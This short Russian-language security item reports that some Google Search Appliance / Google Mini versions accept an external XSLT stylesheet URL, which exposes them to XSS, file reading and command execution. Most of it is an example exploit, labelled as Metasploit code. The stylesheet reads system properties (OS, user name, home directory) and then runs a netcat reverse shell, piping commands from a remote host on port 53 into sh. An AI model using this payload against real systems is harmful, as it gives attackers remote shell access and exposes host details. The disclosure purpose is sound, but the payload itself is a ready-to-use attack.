Google Search Appliance позволяет настраивать вид поискового
интерфейса через стили XSLT. Некоторые версии позволяют
указывать URL для стилей XSLT.
Такие версии, соответственно, подвержены XSS, просмотру
файлов, выполнению произвольных программ, могут раскрывать важную системную
информацию.

Пример:

< !— Google Mini XSLT Code Execution [metasploit] —>
XSLT Version: < xsl:value-of select="system-property(‘xsl:version’)"/ >
< br / >
XSLT Vendor: < xsl:value-of select="system-property(‘xsl:vendor’)" / >
< br / >
XSLT URL: < xsl:value-of select="system-property(‘xsl:vendor-url’)" / >
< br / >
OS: < xsl:value-of select="sys:getProperty(‘os.name’)" / >
< br / >
Version: < xsl:value-of select="sys:getProperty(‘os.version’)" />
< br / >
Arch: < xsl:value-of select="sys:getProperty(‘os.arch’)" / >
< br / >
UserName: < xsl:value-of select="sys:getProperty(‘user.name’)" / >
< br / >
UserHome: < xsl:value-of select="sys:getProperty(‘user.home’)" / >
< br / >
UserDir: < xsl:value-of select="sys:getProperty(‘user.dir’)" / >
< br />
Executing command…< br / >
< xsl:value-of select="run:exec(run:getRuntime(), ‘sh -c nc${IFS}
255.255.255.255${IFS}53|sh|nc${IFS}255.255.255.255${IFS}53’)" / >
< /span >
< /xsl:template >

Эксплоит

Оставить мнение